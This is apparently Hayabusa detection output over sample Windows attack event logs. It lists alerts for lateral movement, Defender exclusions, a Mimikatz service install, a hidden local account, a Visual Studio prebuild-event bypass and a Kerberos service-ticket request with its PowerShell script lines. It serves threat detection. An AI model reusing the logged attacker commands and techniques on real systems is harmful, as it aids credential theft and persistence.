+09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50008 (MSEDGEWIN10) | Dst: 10.0.2.17:49666 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-17 19:38:33.951 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: WCESERVICE | Path: D:\Service\test.exe | Account: LocalSystem | Start Type: demand 
start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2020-12-19 02:56:07.017 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Hidden Local Account Created | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\hideme0007$\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-68DD-5FDD-0000-00101B660000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_hidden_local_account_sysmon.evtx +2021-01-26 22:21:13.237 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\~DF0187A90594A6AC9B.TMP | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.558 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\b8162606fcd2bea192a83c85aaff3292f908cfde | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.560 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 
00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.561 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.683 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.log | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln"" | LID: 0x26f746a2 | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.972 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\blabla.lastbuildstate | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Windows\SysWOW64\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual 
Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 23168 | PGUID: 00247C92-1749-6010-0000-0010EFAAD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: powershell.exe start-process notepad.exe | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | LID: 0x26f746a2 | PID: 18548 | PGUID: 00247C92-174A-6010-0000-0010C0B2D92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\SysWOW64\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: powershell.exe start-process notepad.exe | LID: 0x26f746a2 | PID: 28276 | PGUID: 00247C92-174A-6010-0000-001042DDD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.399 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 18188 | PGUID: 00247C92-174A-6010-0000-0010DCFFD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" 
| LID: 0x26f746a2 | PID: 11676 | PGUID: 00247C92-174A-6010-0000-0010A20ADA2E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | LID: 0x26f746a2 | PID: 11636 | PGUID: 00247C92-174A-6010-0000-0010FF10DA2E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:23.229 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 
00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:23.303 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:23.305 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:33.197 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\prebuildevent_visual_studio.evtx | Process: C:\windows\system32\mmc.exe | PID: 22932 | PGUID: 00247C92-EC0A-600F-0000-00100AEFCC2C,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,$SPNName = 
'MSSQLSvc/Svc-SQL-DB01.offsec.lan',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-Type -AssemblyNAme System.IdentityModel,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Type): ""Add-Type"" ParameterBinding(Add-Type): name=""AssemblyName""; 
value=""System.IdentityModel""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,high,CredAccess,Request A Single Ticket via PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.561 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""ArgumentList""; value=""MSSQLSvc/Svc-SQL-DB01.offsec.lan"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IdentityModel.Tokens.KerberosRequestorSecurityToken"" TerminatingError(New-Object): ""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for 
details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.686 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account 
discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline 